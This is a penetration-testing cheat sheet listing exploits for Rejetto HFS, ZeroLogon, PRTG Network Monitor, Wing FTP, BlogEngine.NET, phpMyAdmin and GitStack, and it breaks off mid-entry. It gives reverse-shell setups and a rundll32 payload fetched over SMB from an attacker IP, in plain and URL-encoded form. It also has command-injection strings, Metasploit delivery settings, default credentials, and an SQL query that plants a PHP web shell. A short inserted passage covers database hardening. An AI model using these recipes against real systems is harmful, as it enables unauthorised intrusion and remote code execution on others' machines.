Public Exploits
CVE-2019-1388: Windows Privilege Escalation Through UAC
Rejetto HTTP File Server RCE [HFS 2.3]
Exploit: https://www.exploit-db.com/exploits/39161
Host /usr/share/windows-resources/binaries/nc.exe on the attacker's web server and set up a listener. Modify hfsexploit.py with the attacker's IP and the reverse-shell listening port.
Run the exploit:
python hfsexploit.py <target-IP> <target-port>
Zero Logon [CVE-2020-1472]
Write-up: https://dirkjanm.io/a-different-way-of-abusing-zerologon/
Exploit: https://github.com/dirkjanm/CVE-2020-1472
In case of error, run the following code:
PRTG Network Monitor [<18.2.39]
Default credentials:
prtgadmin:prtgadmin
Authenticated RCE write-up: https://www.codewatch.org/blog/?p=453
Automated Exploit
Link: https://raw.githubusercontent.com/M4LV0/PRTG-Network-Monitor-RCE/master/prtg-exploit.sh
Adds a user to the Administrators group: pentest::P3nT3st
Log in to the app, grab your cookie and add it to the script.
./exploit.sh -u <Target> -c "<Cookie-value>"
Modify for Reverse Shell
Let's use the Metasploit smb_delivery module to share the payload over port 445.
In exploit.sh, search for "pentest" to identify the payload, then replace the payload code (URL-encode the payload).
rundll32.exe \\10.10.0.172\pbMaor\memorycache.dll,0
Encoded:
rundll32.exe%20%5C%5C10.10.0.172%5CpbMaor%5Cmemorycache.dll%2C0%0A
Manual Exploit
Testing for code execution
Setup -> Account Settings -> Notifications
Parameter: Test; ping -n 1 <IP>
On the Kali machine:
sudo tcpdump -i tun0 ip proto \\icmp -vv
Use Powershell one-liners for gaining a foothold.
Wing FTP Authenticated RCE
Testing for code execution:
sudo tcpdump -i tun0 ip proto \\icmp -vv
os.execute('cmd.exe /c ping -n 1 <IP>')
Try with Metasploit:
use multi/script/web_delivery
set target 3
BlogEngine.NET
RCE, affected versions: <3.3.6.0
CVE-2019-6714
Exploit write-up: https://blog.gdssecurity.com/labs/2019/3/28/remote-code-execution-in-blogenginenet.html
PHPMyAdmin
Requires the phpmyadmin page to be accessible.
Steps to get a reverse shell:
Create a new database and run the following query (the account needs the FILE privilege; backslashes inside a MySQL string literal must be doubled, or use forward slashes, otherwise the path is mangled):
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php"
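As an added defender-side note (not part of the original page), the INTO OUTFILE write above only works when the database account holds the FILE privilege and secure_file_priv is unrestricted. A my.ini fragment with the weak state beside a hardened setting; the directory path is an assumption for this example:

```ini
[mysqld]
# Weak (unset or empty, the usual XAMPP/MariaDB out-of-the-box state):
# any account holding the FILE privilege can write files wherever the
# server process can, including the web root used in the query above.
#secure_file_priv=""

# Hardened: confine SELECT ... INTO OUTFILE / LOAD DATA to one directory
# outside the web root. The path below is an assumption for this example.
secure_file_priv="C:/xampp/mysql/import"

# MySQL 5.7+ only: NULL disables file import/export completely.
# (MariaDB has no NULL form; an empty value there means unrestricted.)
#secure_file_priv=NULL
```

Verify the effective value with SHOW VARIABLES LIKE 'secure_file_priv'; and review SHOW GRANTS; for the phpMyAdmin account, since revoking FILE closes the same path regardless of the setting.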
GitStack RCE
Identify Repository:
GET /rest/repository/
Identify Users:
GET /rest/user/
Code execution on the password parameter: use Burp to intercept the Basic Auth request: